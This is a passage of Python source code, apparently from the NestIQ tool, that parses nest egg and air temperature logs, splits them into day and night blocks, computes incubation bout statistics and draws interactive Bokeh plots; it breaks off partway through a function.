import datetime import json import re import time from pathlib import Path import numpy as np import pandas as pd from bokeh.io import reset_output from bokeh.layouts import column, widgetbox from bokeh.models import HoverTool, PointDrawTool, Span from bokeh.models.widgets import DataTable, TableColumn from bokeh.plotting import ColumnDataSource, figure, output_file, show from bs4 import BeautifulSoup from contextlib import suppress from tkinter import messagebox import niq_classes def convert_to_datetime(dt_string): """ Converts Date/Time cell from master DataFrame to datetime.datetime object. Args: dt_string (str): contents of date/time cell of input file provided by user """ # Return input if already datetime object if type(dt_string) == pd._libs.tslibs.timestamps.Timestamp: return dt_string # Try extracting date/time with various formats while True: with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%y %H:%M:%S") break with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%y %H:%M") break with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%Y %H:%M:%S") break with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%Y %H:%M") break dt = datetime.datetime(*time_struct[0:6]) return dt def is_partial(df, first_index, last_index, expected_dur): """ Checks if given range of indices represents a complete daytime or nighttime period. Args: df (pd.DataFrame) first_index (int) last_index (int): expected_dur (int): expected duration in seconds """ # Allow 5 min (300 sec) of discrepency from expected durration block_dur_thresh = expected_dur - 300 start_time = df.loc[first_index, "date_time"] end_time = df.loc[last_index, "date_time"] block_dur = end_time - start_time if block_dur > datetime.timedelta(seconds=block_dur_thresh): return False return True def split_days(gui): """ Analyze dates of master DataFrame and parse row data into daytime and nighttime block objects. """ def is_daytime(date_time): """ Check if a given time falls within the daytime period defined by the user. Args: date_time (datetime.datetime) """ time = date_time.time() # When the start of daytime is earlier in the day than the start of nighttime if day_start < night_start: if time >= day_start and time < night_start: return True # When the start of nighttime is earlier in the day than the start of daytime elif night_start < day_start: if not (time >= night_start and time < day_start): return True return False def get_durs(day_start, night_start): """ Get expected durations in seconds for complete daytime and nightime periods. Args: day_start (datetime.time): user-defined start of daytime night_start (datetime.time) user-defined start of nighttime """ # Convert start times to datetime objects d = datetime.datetime(2020, 1, 1, day_start.hour, day_start.minute, day_start.second) n = datetime.datetime(2020, 1, 1, night_start.hour, night_start.minute, night_start.second) # When the start of daytime is earlier in the day than the start of nighttime if day_start < night_start: day_dur = (n - d).total_seconds() night_dur = 86400 - day_dur # Total seconds in day - daytime duration # When the start of nighttime is earlier in the day than the start of daytime elif night_start < day_start: night_dur = (d - n).total_seconds() day_dur = 86400 - day_dur # Total seconds in day - nighttime duration return day_dur, night_dur # Create time objects from entry box values day_start = convert_to_datetime(f"01/01/2020 {str(gui.day_start_E.get())}").time() night_start = convert_to_datetime(f"01/01/2020 {str(gui.night_start_E.get())}").time() # Get daytime and nighttime durations day_dur, night_dur = get_durs(day_start, night_start) # Create copy of master DataFrame to be appended to temp_df = gui.master_df.copy() temp_df["is_daytime"] = temp_df["date_time"].apply(is_daytime) # Detect day/night or night/day transitions int_states = temp_df.loc[:, "is_daytime"].replace([True, False], [1, 0]) state_changed = int_states.diff().apply(abs).astype(bool) state_changed.iloc[0] = False temp_df["transition_point"] = state_changed # Collect indices of day/night transition points filt = temp_df["transition_point"] == True transition_indices = temp_df[filt].index.to_list() transition_indices.append(len(temp_df)) # Construct day and night blocks from transition points days_list, nights_list = [], [] if is_daytime(temp_df.loc[0, "date_time"]): block_list = days_list block_dur_thresh = day_dur else: block_list = nights_list block_dur_thresh = night_dur cur_index = 0 for next_index in transition_indices: partial = is_partial(temp_df, cur_index, next_index - 1, block_dur_thresh) block_list.append(niq_classes.Block(gui, cur_index, (next_index - 1), partial)) block_dur_thresh = day_dur if block_dur_thresh == night_dur else night_dur block_list = days_list if block_list == nights_list else nights_list cur_index = next_index return days_list, nights_list def get_day_dur(day_start, night_start): """ Finds the duration of the daytime period specified by the user. Args: day_start (str): start of daytime period night_start (str): end of daytime period """ day = re.search(r"(\d+)(:)(\d+)", day_start) day_float = float(day.group(1)) + (float(day.group(3)) / 60) night = re.search(r"(\d+)(:)(\d+)", night_start) night_float = float(night.group(1)) + (float(night.group(3)) / 60) return (night_float - day_float) * 60 def smooth_series(radius, col): """ Generates "smoothed" copy of input data by applying a rolling mean of the requested radius. Args: radius (int): number of values to include in rolling mean (e.g. radius = 1 means average values i, i-1 and i+1) col (pd.Series): column data to be smoothed """ # Return original column if radius is less than 1 if radius <= 0: return col window = (radius * 2) + 1 return col.rolling(window, min_periods=1, center=True).mean() def get_verts_from_html(gui, in_file, alt=False): """ Creates vertex objects from vertices placed by the user in the provided HTML file. Args: gui (GUIClass) in_file (str): path to and name of HTML file containing user-provided vertex locations alt (Bool): dictates if vertices are extracted from the table or alternative variable in HTML file """ def get_data_points_from_html(gui, in_file): """ Extracts the corresponding data point for each point placed by the user in the HTML file. Args: gui (GUIClass) in_file (str): path to and name of HTML file containing user-provided vertex locations """ data_point_list = [] dp_col_num = gui.master_df.columns.get_loc("data_point") max_dp = gui.master_df.iloc[-1, dp_col_num] min_dp = gui.master_df.iloc[0, dp_col_num] with open(in_file, "r") as vertex_file: content = vertex_file.read() # Extract list of vertex data points try: # Try using Beautiful soup method soup = BeautifulSoup(content, "html.parser") # Extract html behind table table_widget = "bk-widget-box bk-layout-fixed" table_content = soup.find("div", class_=table_widget) # Extract leftmost column of data (data points) hits = table_content.find_all("div", class_="slick-cell l1 r1") dp_list = [hit.find("span", style="text-align: left;").text for hit in hits] # Get selected vertex if exists cell_re = re.compile(r"slick-cell l1 r1 selected\"><span style=\"text-align: left;\">(\d+)") selected = re.search(cell_re, content) if selected is not None: dp_list.append(selected.group(1)) except AttributeError: # Fall back to regex method try: dp_list = re.search(r'"data"\:\{"x":\[([^\]]*)', content).group(1).split(",") except AttributeError: dp_list = [] dp_list = [dp for dp in dp_list if is_number(dp)] for hit in dp_list: # Clean hits and append data_point = round(float(hit)) data_point = max(data_point, min_dp) data_point = min(data_point, max_dp) data_point_list.append(data_point) # Conversion to set removes redundant entries return sorted(set(data_point_list)) vertices = [] vertex_data_points = get_data_points_from_html(gui, in_file) # Make sure there is at least one data point detected in input plot if len(vertex_data_points) == 0: messagebox.showerror( "Input Plot Error", 'No vertices were detected in the provided plot.\n\n' + 'When saving plots, ensure the file type option is set to \"Webpage, Complete\" not \"Webpage, HTML only\".' ) return None # Flag -- make more pandas friendly for i in range(len(gui.master_df)): # Search for gap between index value and corresponding datapoint if int(gui.master_df.loc[i, "data_point"]) == int(vertex_data_points[0]): # Delta is discrepency between index and data point number delta = (vertex_data_points[0] - i) - 1 break # Search for gap between index value and corresponding datapoint filt = gui.master_df.loc[:, "data_point"] == vertex_data_points[0] first_dp_index = gui.master_df.loc[filt].index delta = int(gui.master_df.loc[first_dp_index, "data_point"] - first_dp_index) # Determine if first vertex is an off start or on start first_vert_temper = gui.master_df.loc[vertex_data_points[0] - delta, "egg_temper"] second_vert_temper = gui.master_df.loc[vertex_data_points[1] - delta, "egg_temper"] vert_type = "off" if first_vert_temper > second_vert_temper else "on" # Generate vertices for data_point in vertex_data_points: index = data_point - delta vertices.append(niq_classes.Vertex(index, gui.master_df.loc[index, "egg_temper"], vert_type)) vert_type = "on" if vert_type == "off" else "off" return vertices def extract_bouts_in_range(gui, total_bouts, first_index, last_index): """ Extracts vertices falling into a specified window of index values. Args: gui (GUIClass) total_bouts (list): every bout identified for the current input file first_index (int) last_index (int) """ bouts_in_range = [] left_limit, right_limit = 0, 0 if len(total_bouts) < 1 or last_index < total_bouts[0].first or first_index > total_bouts[-1].last: return bouts_in_range # Determine first bout in range for i in range(len(total_bouts)): if total_bouts[i].middle >= first_index: left_limit = i break # Determine last bout in range for i in range((len(total_bouts) - 1), -1, -1): if total_bouts[i].middle <= last_index: right_limit = i break bouts_in_range = total_bouts[left_limit : (right_limit + 1)] bouts_in_range.sort(key=lambda x: x.first) return bouts_in_range def get_date_blocks(gui): """ Creates Block objects for each date represented in the input file provided. Args: gui (GUIClass) """ # Get unique dates date_blocks = [] dates = gui.master_df["date_time"].apply(datetime.datetime.date).unique() # Get data points corrisponding to each date for date in dates: sub_df = gui.master_df[gui.master_df["date_time"].apply(datetime.datetime.date) == date] # 86400 = number of seconds in 24 hr partial = is_partial(gui.master_df, sub_df.index.min(), sub_df.index.max(), 86400) # Create Block object date_blocks.append(niq_classes.Block(gui, sub_df.index.min(), sub_df.index.max(), partial)) return date_blocks def write_stats(gui, date_blocks, master_block): """ Calculates and gathers several statistics and subsequently dumps them into the individual statistics file and/or the multi-input file statistics file depending on the user's requested output. Args: gui (GUIClass) days (BlockGroup): contains every day object and information about the group as a whole nights (BlockGroup): contains every night object and information about the group as a whole date_blocks (BlockGroup): contains every date Block which cary informationa bout data for each date master_block (block): block built from the entire input file """ if gui.get_stats_BV.get(): out_file = gui.stats_file_E.get() elif gui.multi_in_stats_BV.get(): out_file = gui.multi_in_stats_file_E.get() if not (gui.get_stats_BV.get() or gui.multi_in_stats_BV.get()): return # Used to indictate scope of certain statistics qualifier = " (D)," if gui.restrict_search_BV.get() else " (DN)," # Print input file name on top (remove directories) header = f"{gui.active_input_path.name}\n" if gui.day_num_BV.get(): header += "Day Number," if gui.date_BV.get(): header += "Date," if gui.off_count_BV.get(): header += "Off-bout Count" + qualifier if gui.off_dur_BV.get(): header += "Mean Off Duration" + qualifier if gui.off_dur_sd_BV.get(): header += "Off Dur StDev" + qualifier if gui.off_dec_BV.get(): header += "Mean Off Temp Drop" + qualifier if gui.off_dec_sd_BV.get(): header += "Off Drop StDev" + qualifier if gui.mean_off_temper_BV.get(): header += "Mean Off-Bout Temp" + qualifier if gui.off_time_sum_BV.get(): header += "Off-Bout Time Sum" + qualifier if gui.on_count_BV.get(): header += "On-bout Count" + qualifier if gui.on_dur_BV.get(): header += "Mean On Duration" + qualifier if gui.on_dur_sd_BV.get(): header += "On Dur StDev" + qualifier if gui.on_inc_BV.get(): header += "Mean On Temp Rise" + qualifier if gui.on_inc_sd_BV.get(): header += "On Rise StDev" + qualifier if gui.mean_on_temper_BV.get(): header += "Mean On-Bout Temp" + qualifier if gui.on_time_sum_BV.get(): header += "On-Bout Time Sum" + qualifier if gui.time_above_temper_BV.get(): header += "Time above " + gui.time_above_temper_E.get() + " (minutes)," if gui.time_below_temper_BV.get(): header += "Time below " + gui.time_below_temper_E.get() + " (minutes)," if gui.bouts_dropped_BV.get(): header += "Vertices Dropped" + qualifier if gui.mean_temper_d_BV.get(): header += "Mean Daytime Egg Temp," if gui.mean_temper_d_sd_BV.get(): header += "Day Egg Temp StDev," if gui.median_temper_d_BV.get(): header += "Median Daytime Egg Temp," if gui.min_temper_d_BV.get(): header += "Min Daytime Egg Temp," if gui.max_temper_d_BV.get(): header += "Max Daytime Egg Temp," if gui.mean_temper_n_BV.get(): header += "Mean Nighttime Egg Temp," if gui.mean_temper_n_sd_BV.get(): header += "Night Egg Temp StDev," if gui.median_temper_n_BV.get(): header += "Median Nighttime Egg Temp," if gui.min_temper_n_BV.get(): header += "Min Nighttime Egg Temp," if gui.max_temper_n_BV.get(): header += "Max Nighttime Egg Temp," if gui.mean_temper_dn_BV.get(): header += "Mean Egg Temp (DN)," if gui.mean_temper_dn_sd_BV.get(): header += "Egg Temp StDev (DN)," if gui.median_temper_dn_BV.get(): header += "Median Egg Temp (DN)," if gui.min_temper_dn_BV.get(): header += "Min Egg Temp (DN)," if gui.max_temper_dn_BV.get(): header += "Max Egg Temp (DN)," if gui.air_valid: if gui.mean_air_temper_BV.get(): header += "Mean Air Temp (DN)," if gui.mean_air_temper_sd_BV.get(): header += "Air Temp StDev (DN)," if gui.min_air_temper_BV.get(): header += "Min Air Temp (DN)," if gui.max_air_temper_BV.get(): header += "Max Air Temp (DN)," # ----------------------------------------------------------------------------------------------- day_rows = [] # Print individual day stats for i, block in enumerate(date_blocks): day_row = "" partial = " (Partial)" if block.partial_day else " (Full)" if gui.day_num_BV.get(): day_row += f"{i + 1}{partial}," if gui.date_BV.get(): day_row += f"{block.date}," if gui.off_count_BV.get(): day_row += f"{block.off_count}," if gui.off_dur_BV.get(): day_row += f"{block.mean_off_dur}," if gui.off_dur_sd_BV.get(): day_row += f"{block.off_dur_stdev}," if gui.off_dec_BV.get(): day_row += f"{block.mean_off_dec}," if gui.off_dec_sd_BV.get(): day_row += f"{block.off_dec_stdev}," if gui.mean_off_temper_BV.get(): day_row += f"{block.mean_off_temper}," if gui.off_time_sum_BV.get(): day_row += f"{block.off_time_sum}," if gui.on_count_BV.get(): day_row += f"{block.on_count}," if gui.on_dur_BV.get(): day_row += f"{block.mean_on_dur}," if gui.on_dur_sd_BV.get(): day_row += f"{block.on_dur_stdev}," if gui.on_inc_BV.get(): day_row += f"{block.mean_on_inc}," if gui.on_inc_sd_BV.get(): day_row += f"{block.on_inc_stdev}," if gui.mean_on_temper_BV.get(): day_row += f"{block.mean_on_temper}," if gui.on_time_sum_BV.get(): day_row += f"{block.on_time_sum}," if gui.time_above_temper_BV.get(): day_row += f"{block.time_above_temper}," if gui.time_below_temper_BV.get(): day_row += f"{block.time_below_temper}," if gui.bouts_dropped_BV.get(): day_row += f"{block.bouts_dropped}," if gui.mean_temper_d_BV.get(): day_row += f"{block.mean_egg_temper_day}," if gui.mean_temper_d_sd_BV.get(): day_row += f"{block.egg_temper_stdev_day}," if gui.median_temper_d_BV.get(): day_row += f"{block.median_egg_temper_day}," if gui.min_temper_d_BV.get(): day_row += f"{block.min_egg_temper_day}," if gui.max_temper_d_BV.get(): day_row += f"{block.max_egg_temper_day}," if gui.mean_temper_n_BV.get(): day_row += f"{block.mean_egg_temper_night}," if gui.mean_temper_n_sd_BV.get(): day_row += f"{block.egg_temper_stdev_night}," if gui.median_temper_n_BV.get(): day_row += f"{block.median_egg_temper_night}," if gui.min_temper_n_BV.get(): day_row += f"{block.min_egg_temper_night}," if gui.max_temper_n_BV.get(): day_row += f"{block.max_egg_temper_night}," if gui.mean_temper_dn_BV.get(): day_row += f"{block.mean_egg_temper}," if gui.mean_temper_dn_sd_BV.get(): day_row += f"{block.egg_temper_stdev}," if gui.median_temper_dn_BV.get(): day_row += f"{block.median_temper}," if gui.min_temper_dn_BV.get(): day_row += f"{block.min_egg_temper}," if gui.max_temper_dn_BV.get(): day_row += f"{block.max_egg_temper}," if gui.air_valid: if gui.mean_air_temper_BV.get(): day_row += f"{block.mean_air_temper}," if gui.mean_air_temper_sd_BV.get(): day_row += f"{block.air_temper_stdev}," if gui.min_air_temper_BV.get(): day_row += f"{block.min_air_temper}," if gui.max_air_temper_BV.get(): day_row += f"{block.max_air_temper}," day_rows.append(day_row) gui.multi_in_full_day_count += len(date_blocks) # ----------------------------------------------------------------------------------------------- # Output stats summary for entire input file summary_row = "" if gui.day_num_BV.get(): summary_row += f"--," if gui.date_BV.get(): summary_row += f"ALL DATA," if gui.off_count_BV.get(): summary_row += f"{master_block.off_count}," if gui.off_dur_BV.get(): summary_row += f"{master_block.mean_off_dur}," if gui.off_dur_sd_BV.get(): summary_row += f"{master_block.off_dur_stdev}," if gui.off_dec_BV.get(): summary_row += f"{master_block.mean_off_dec}," if gui.off_dec_sd_BV.get(): summary_row += f"{master_block.off_dec_stdev}," if gui.mean_off_temper_BV.get(): summary_row += f"{master_block.mean_off_temper}," if gui.off_time_sum_BV.get(): summary_row += f"{master_block.off_time_sum}," if gui.on_count_BV.get(): summary_row += f"{master_block.on_count}," if gui.on_dur_BV.get(): summary_row += f"{master_block.mean_on_dur}," if gui.on_dur_sd_BV.get(): summary_row += f"{master_block.on_dur_stdev}," if gui.on_inc_BV.get(): summary_row += f"{master_block.mean_on_inc}," if gui.on_inc_sd_BV.get(): summary_row += f"{master_block.on_inc_stdev}," if gui.mean_on_temper_BV.get(): summary_row += f"{master_block.mean_on_temper}," if gui.on_time_sum_BV.get(): summary_row += f"{master_block.on_time_sum}," if gui.time_above_temper_BV.get(): summary_row += f"{master_block.time_above_temper}," if gui.time_below_temper_BV.get(): summary_row += f"{master_block.time_below_temper}," if gui.bouts_dropped_BV.get(): summary_row += f"{master_block.bouts_dropped}," if gui.mean_temper_d_BV.get(): summary_row += f"{master_block.mean_egg_temper_day}," if gui.mean_temper_d_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev_day}," if gui.median_temper_d_BV.get(): summary_row += f"{master_block.median_egg_temper_day}," if gui.min_temper_d_BV.get(): summary_row += f"{master_block.min_egg_temper_day}," if gui.max_temper_d_BV.get(): summary_row += f"{master_block.max_egg_temper_day}," if gui.mean_temper_n_BV.get(): summary_row += f"{master_block.mean_egg_temper_night}," if gui.mean_temper_n_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev_night}," if gui.median_temper_n_BV.get(): summary_row += f"{master_block.median_egg_temper_night}," if gui.min_temper_n_BV.get(): summary_row += f"{master_block.min_egg_temper_night}," if gui.max_temper_n_BV.get(): summary_row += f"{master_block.max_egg_temper_night}," if gui.mean_temper_dn_BV.get(): summary_row += f"{master_block.mean_egg_temper}," if gui.mean_temper_dn_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev}," if gui.median_temper_dn_BV.get(): summary_row += f"{master_block.median_temper}," if gui.min_temper_dn_BV.get(): summary_row += f"{master_block.min_egg_temper}," if gui.max_temper_dn_BV.get(): summary_row += f"{master_block.max_egg_temper}," if gui.air_valid: if gui.mean_air_temper_BV.get(): summary_row += f"{master_block.mean_air_temper}," if gui.mean_air_temper_sd_BV.get(): summary_row += f"{master_block.air_temper_stdev}," if gui.min_air_temper_BV.get(): summary_row += f"{master_block.min_air_temper}," if gui.max_air_temper_BV.get(): summary_row += f"{master_block.max_air_temper}," summary_row += "\n\n" # Determine what files to write day statistics to out_paths = [] if gui.get_stats_BV.get(): out_paths.append(Path(gui.stats_file_E.get())) if gui.multi_in_stats_BV.get(): out_paths.append(Path(gui.multi_in_stats_file_E.get())) # Write day statistics for path in out_paths: with open(path, "a") as out_file: print(header, end="\n", file=out_file) print("\n".join(day_rows), end="\n", file=out_file) print(summary_row, end="\n", file=out_file) if not gui.get_stats_BV.get(): return # ----------------------------------------------------------------------------------------------- # Report information on individual bouts indi_header = "Individual Bout Stats\n" indi_header += ( "Date,Bout Type,Start Time,End Time,Start Data Point,End Data Point,Duration (min),Egg Temp Change,Start Egg Temp,End Egg Temp,Mean Egg Temp, Egg Temp StDev," ) if gui.air_valid: indi_header += "Start Air Temp, End Air Temp, Mean Air Temp, Air Temp StDev" bouts = master_block.bouts bout_rows = [] cur_date = "" for bout in bouts: row = "" # Print date if it is the first row corresponding to this date this_date = gui.master_df.loc[bout.first, "date_time"].strftime(r"%m/%d/%Y") row += "," if this_date == cur_date else f"{this_date}," cur_date = this_date row += f"{bout.bout_type}," row += ( f"{gui.master_df.loc[bout.first, 'date_time'].strftime(r'%H:%M')}," + f"{gui.master_df.loc[bout.last, 'date_time'].strftime(r'%H:%M')}," + f"{gui.master_df.loc[bout.first, 'data_point']}," + f"{gui.master_df.loc[bout.last, 'data_point']}," + f"{bout.dur}," + f"{bout.temper_change}," + f"{gui.master_df.loc[bout.first, 'egg_temper']}," + f"{gui.master_df.loc[bout.last, 'egg_temper']}," + f"{bout.mean_egg_temper}," + f"{bout.egg_temper_stdev}," ) if gui.air_valid: row += ( f"{gui.master_df.loc[bout.first, 'air_temper']}," + f"{gui.master_df.loc[bout.last, 'air_temper']}," + f"{bout.mean_air_temper}," + f"{bout.air_temper_stdev}" ) bout_rows.append(row) with open(Path(gui.stats_file_E.get()), "a") as out_file: print(indi_header, end="\n", file=out_file) print("\n".join(bout_rows), file=out_file) def generate_plot(gui, days_list, edit_mode=False, out_path=None): """ Uses the Bokeh module to generate an interactive plot for the current input file. Args: gui (GUIClass): days_list (list): used to place vertical day delimiting line edit_mode (bool): generates a modified plot that allows for vertex manipulation """ def get_plot_dims(): """ Determine plot dimientions based on either user provided values or monitor dimension detection. """ if not gui.manual_plot_dims.get(): try: mon_dims = (gui.root.winfo_screenwidth(), gui.root.winfo_screenheight()) mon_x = mon_dims[0] mon_y = mon_dims[1] plot_width = int(mon_x) - 100 plot_height = int(mon_y) - 200 except: print("Defaulting to manual plot dimensions") plot_width = int(gui.plot_dim_x_E.get()) plot_height = int(gui.plot_dim_y_E.get()) else: plot_width = int(gui.plot_dim_x_E.get()) plot_height = int(gui.plot_dim_y_E.get()) return plot_width, plot_height def get_plot_axes(): """ Determine proper constrains of y axis """ y_min = float("inf") y_max = float("-inf") if gui.plot_egg_BV.get(): y_min = min(y_min, df["egg_temper"].min()) y_max = max(y_max, df["egg_temper"].max()) if gui.plot_air_BV.get() and gui.air_valid: y_min = min(y_min, df["air_temper"].min()) y_max = max(y_max, df["air_temper"].max()) if gui.plot_adj_BV.get(): y_min = min(y_min, df["smoothed_adj_temper"].min()) y_max = max(y_max, df["smoothed_adj_temper"].max()) y_min -= 2 y_max += 2 return y_min, y_max def generate_table(): """ Generate table with vertex information """ table_title = "Egg Temperature" verts = get_verts_from_master_df(df) x_list, y_list = [], [] # Add vertices to table (allow egg_tempers or adj_tempers, not both) if gui.plot_egg_BV.get(): x_list += [df.loc[vert.index, "data_point"] for vert in verts] y_list += [df.loc[vert.index, "egg_temper"] for vert in verts] elif gui.plot_adj_BV.get(): table_title = "Adjusted Temperature" x_list += [df.loc[vert.index, "data_point"] for vert in verts] y_list += [df.loc[vert.index, "smoothed_adj_temper"] for vert in verts] data = {"x": x_list, "y": y_list} src = ColumnDataSource(data) columns = [TableColumn(field="x", title="Transition Data Point"), TableColumn(field="y", title=table_title)] # FLAG shoud make height dynamic data_table = DataTable(source=src, columns=columns, width=500, height=100000) return data_table def append_input_info(path): # Get number of seconds between each data point first = df["date_time"].iloc[0] last = df["date_time"].iloc[-1] delta_sec = (last - first).total_seconds() interval = round(delta_sec / len(df)) # Create dictionary summarizing critical input file information input_dict = { "first_dp": int(df["data_point"].iloc[0]), "first_dt": df["date_time"].iloc[0].strftime(r"%m/%d/%Y %H:%M:%S"), "dt_interval": interval, "egg_temper": df["egg_temper"].tolist(), "air_temper": df["air_temper"].tolist() } # Append input file information to the HTML file with open(path, "a") as file: file.write("\n\n<!--NestIQ input data\n") file.write(json.dumps(input_dict)) file.write("\n-->\n") df = gui.master_df master_array = df_to_array(df) # Clears previous plots from memory reset_output() # Set output file out_path = out_path if out_path is not None else Path(gui.plot_file_E.get()) output_file(out_path) plot_width, plot_height = get_plot_dims() TOOLTIPS = [("Data Point", "$x{int}"), ("Temperature", "$y")] hover = HoverTool(tooltips=TOOLTIPS) # Set plot title plot_name = Path(gui.input_file_E.get()).stem if gui.plot_title_E.get() != "": plot_name = gui.plot_title_E.get() # Set plot axes y_min, y_max = get_plot_axes() dp_col_num = df.columns.get_loc("data_point") # Create core plot plot = figure( tools=[hover, "box_select, box_zoom, wheel_zoom, pan, reset, save"], x_range=[df.iloc[0, dp_col_num], df.iloc[-1, dp_col_num]], y_range=[y_min, y_max], title=plot_name, x_axis_label="Data Point", y_axis_label="Temperature (C)", plot_width=plot_width, plot_height=plot_height, ) # Add vertical lines delimiting days if gui.show_day_markers_BV.get(): for day in days_list: vertical_line = Span( location=int(df.loc[day.first, "data_point"]), dimension="height", line_color=gui.day_marker_color.get(), line_width=float(gui.day_marker_width_E.get()), line_alpha=0.4, ) plot.renderers.extend([vertical_line]) plot.grid.visible = True if gui.show_grid_BV.get() else False # Define data point colors if edit_mode: # Set static color color_ = "gray" alpha_ = 1 else: # Set color based on bout state bout_state_col_num = 2 color_key = {0: gui.off_point_color.get(), 1: gui.on_point_color.get(), 2: "lightgray"} color_ = np.vectorize(color_key.get)(master_array[:, bout_state_col_num]) alpha_key = {0: 1, 1: 1, 2: 1} alpha_ = np.vectorize(alpha_key.get)(master_array[:, bout_state_col_num]) radius = int(gui.smoothing_radius_E.get()) # Get array of air temperatures and smooth if requested if gui.air_valid and gui.plot_air_BV.get(): air_array = df["air_temper"] if gui.smooth_status_IV.get(): air_array = smooth_series(radius, air_array) # Plot air temperatures plot.line( df["data_point"], air_array, line_width=float(gui.air_line_width_E.get()), color=gui.air_line_color.get(), line_alpha=1, legend="Air temperature", ) # Get array of egg temperatures and smooth if requested if gui.plot_egg_BV.get(): egg_array = df["egg_temper"] if gui.smooth_status_IV.get(): egg_array = smooth_series(radius, egg_array) # Update legend if not edit_mode: legend_ = "On-bout (egg)" if gui.plot_adj_BV.get() else "On-bout" plot.circle(df.loc[0, "data_point"], egg_array[0], size=float(gui.on_point_size_E.get()), color=gui.on_point_color.get(), legend=legend_) legend_ = "Off-bout (egg)" if gui.plot_adj_BV.get() else "Off-bout" plot.circle(df.loc[0, "data_point"], egg_array[0], size=float(gui.on_point_size_E.get()), color=gui.off_point_color.get(), legend=legend_) # Plot egg temperatures if float(gui.bout_line_width_E.get()) > 0: plot.line(df["data_point"], egg_array, line_width=float(gui.bout_line_width_E.get()), color=gui.bout_line_color.get()) plot.circle(df["data_point"], egg_array, size=float(gui.on_point_size_E.get()), color=color_, alpha=alpha_) # Get array of adjusted (egg - air) temperatures and smooth if requested if gui.plot_adj_BV.get(): adj_array = df["smoothed_adj_temper"] # Plot line if float(gui.bout_line_width_E.get()) > 0: plot.line(df["data_point"], adj_array, line_width=float(gui.bout_line_width_E.get()), color=gui.bout_line_color.get()) # Plot adjusted temperatures as triangles if egg temperatures are also being plotted plot_shape = plot.triangle if gui.plot_egg_BV.get() else plot.circle # Add legend values if edit_mode: plot.circle(df.loc[0, "data_point"], adj_array, size=float(gui.on_point_size_E.get()), color="gray", legend="Temperature reading") else: plot_shape( df.loc[0, "data_point"], adj_array, size=float(gui.on_point_size_E.get()), color=gui.on_point_color.get(), legend="On-bout (egg - air)", ) plot_shape( df.loc[0, "data_point"], adj_array, size=float(gui.on_point_size_E.get()), color=gui.off_point_color.get(), legend="Off-bout (egg - air)", ) # Add data points plot_shape(df["data_point"], adj_array, size=float(gui.on_point_size_E.get()), color=color_, alpha=alpha_) data_table = generate_table() if edit_mode: # Plot vertices as large circles in select mode renderer = plot.circle("x", "y", size=float(gui.on_point_size_E.get()), color="red", fill_alpha=0.8, legend="Incubation State Change", source=data_table.source) draw_tool = PointDrawTool(renderers=[renderer], empty_value=1) plot.add_tools(draw_tool) plot.toolbar.active_drag = draw_tool # Get formatting settings from GUI plot.title.text_font_size = gui.title_font_size_E.get() + "pt" plot.axis.axis_label_text_font_size = gui.axis_title_font_size_E.get() + "pt" plot.axis.major_label_text_font_size = gui.axis_label_font_size_E.get() + "pt" plot.axis.major_tick_line_width = int(gui.axis_tick_size_E.get()) plot.axis.minor_tick_line_width = int(gui.axis_tick_size_E.get()) plot.axis.major_tick_out = int(gui.axis_tick_size_E.get()) plot.axis.minor_tick_out = int(gui.axis_tick_size_E.get()) plot.legend.label_text_font_size = gui.legend_font_size_E.get() + "pt" plot.legend.click_policy = "hide" plot.legend.location = gui.legend_loc.get() plot.background_fill_color = None plot.border_fill_color = None show(column(plot, widgetbox(data_table))) append_input_info(out_path) def get_verts_from_master_df(master_df): """ Extracts vertex objects based on state transitions in master_df. Args: master_df (pd.DataFrame) """ if "bout_state" not in master_df.columns: return [] # Convert bout_states to integers temp_df = master_df.copy() int_states = temp_df.loc[:, "bout_state"].replace(["off", "on", "None"], [0, 1, 2]) # Create Boolean Series that stores if the state has changed state_changed = int_states.diff().astype(bool) state_changed.iloc[0] = False # Extract indices of rows where the state changes vert_indices = master_df[state_changed].index.tolist() vertices = [] for index in vert_indices: row = master_df.loc[index] vertices.append(niq_classes.Vertex(index, row["egg_temper"], row["bout_state"])) # Add vertices at begining and end of data set last = len(master_df) - 1 vertices.append(niq_classes.Vertex(0, master_df.loc[0, "egg_temper"], master_df.loc[0, "bout_state"])) vertices.append(niq_classes.Vertex(last, master_df.loc[last, "egg_temper"], master_df.loc[last, "bout_state"])) vertices.sort(key=lambda x: x.index) return vertices def replace_entry(entry, new_value): entry.delete(0, "end") entry.insert(0, new_value) def filter_by_dur(gui): """ Purges the master df of state clusters failing to meet a given duration threshold. Args: gui (GUI) """ dur_thresh = int(gui.dur_thresh_E.get()) df = gui.master_df bouts_dropped_locs = set() for bout in gui.master_block.bouts: dur = bout.last - bout.first # If duration threshold not met if dur < dur_thresh: # Set bout_state for corrisponding rows to that of adjacent row new_state = "on" if bout.bout_type == "off" else "off" df.loc[bout.first:bout.last, "bout_state"] = new_state bouts_dropped_locs.add(bout.middle) # Delete bout gui.master_block.bouts.remove(bout) return df, bouts_dropped_locs def set_unique_path(entry, path, ext): """ Incriments an identificaiton number until a unique file name is found then fills entry box with unique path. Args: entry (tk.Entry): entry box being updated path (pathlib.Path): path to check for uniqueness ext (str): file extension """ counter = 0 ori_stem = path.stem file_path = Path(path).with_suffix(ext) # Adds trailing number until unique path is found while file_path.exists(): counter += 1 file_path = (file_path.parent / (ori_stem + "_" + str(counter).zfill(3))).with_suffix(ext) replace_entry(entry, file_path) def remove_curly(*entries, string=False): """ Removes curly braces from entry box contents. These are often added for paths containing spaces. Args: entries (tk.Entry) """ if string: return entries[0].lstrip("{").rstrip("}") for entry in entries: replace_entry(entry, entry.get().lstrip("{").rstrip("}")) def df_to_array(df): """ Convert master DataFrame to numpy array. Columns: 0 - data point 1 - delta temper (emision), change in smoothed_egg_temper or smoothed_adj_temper depending on user setting 2 - bout state """ # If array is passed, just return if type(df) == np.ndarray: return df # Grab appropriate columns if "bout_state" in df.columns: mod_df = df.loc[:, ["data_point", "delta_temper", "bout_state"]].copy() # Convert bout stats to integers mod_df.loc[:, "bout_state"].replace(["off", "on", "None"], [0, 1, 2], inplace=True) else: mod_df = df[["data_point", "delta_temper"]] return mod_df.to_numpy() def get_bouts_from_verts(gui, verts): """ Extracts bout objects based on vertex locations. Args: gui (GUIClass) """ bouts = [] # Return if insufficient number of vertices supplied if verts is None or len(verts) < 2: return bouts # Create bout objects 